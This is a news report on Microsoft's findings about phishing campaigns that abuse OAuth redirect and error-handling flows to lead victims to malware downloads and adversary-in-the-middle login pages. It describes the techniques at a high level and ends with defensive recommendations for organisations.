Security researchers at Microsoft have reported phishing campaigns that abuse OAuth redirection mechanisms to deliver malware and redirect victims to attacker-controlled infrastructure. The activity demonstrates how threat actors can exploit legitimate authentication processes to bypass common email and browser security protections.
OAuth is an open authorization standard widely used by online services to allow users to sign in and grant applications access to their accounts without sharing passwords. The protocol enables identity providers to issue tokens that allow third-party services to access specific resources on a user’s behalf. Because the process relies on trusted authentication flows and redirection between services, it is frequently used across enterprise and cloud environments.
According to Microsoft’s analysis, attackers are exploiting error handling behavior within OAuth authorization flows. By abusing these legitimate redirection mechanisms, malicious applications can redirect users from trusted identity providers to attacker-controlled sites. The technique allows phishing pages or malware hosting infrastructure to appear as part of a normal login or authentication process.
Researchers said the campaigns typically begin with phishing emails that encourage recipients to click on links related to workplace activity. Examples of these lures include invitations to view documents, recordings of meetings, electronic signature requests, or messages that appear to come from collaboration platforms. When victims click the link, they are routed through legitimate authentication endpoints before being redirected to malicious destinations.
In some cases, the redirect chain ultimately leads to malware delivery. Microsoft observed attacks distributing ZIP archives containing Windows shortcut files that execute PowerShell commands when opened. The commands perform reconnaissance on the infected system, collect information about the environment, and then deploy additional malicious components. The payloads may include installers that drop decoy documents to disguise the attack while malicious files are loaded through DLL side-loading techniques.
Other campaigns use the same redirect abuse technique to direct victims to an adversary in the middle of phishing frameworks. These systems intercept credentials and authentication cookies, enabling attackers to gain access to online accounts even when multi-factor authentication is used.
Microsoft noted that attackers also manipulate parameters used in OAuth authentication requests. In some cases, threat actors encode the target’s email address in a request parameter designed to correlate authentication responses. When victims are redirected to the phishing page, the email address is automatically populated, which can increase the credibility of the login prompt.
The company said the campaigns illustrate how attackers are shifting tactics as organizations strengthen defenses against credential theft and multi-factor authentication bypass. Instead of directly stealing passwords, adversaries are increasingly targeting trust relationships and protocol behavior within widely used identity systems.
Microsoft recommends that organizations monitor OAuth application activity, review redirect configurations, and restrict risky or unknown applications. Security teams are also advised to monitor unusual authentication flows and educate users about suspicious links that may appear to originate from legitimate services.
The findings highlight the challenges of defending against attacks that rely on trusted infrastructure and standards-compliant behavior. Because the malicious activity occurs within legitimate authentication flows, it can blend into normal enterprise traffic and evade traditional phishing detection tools.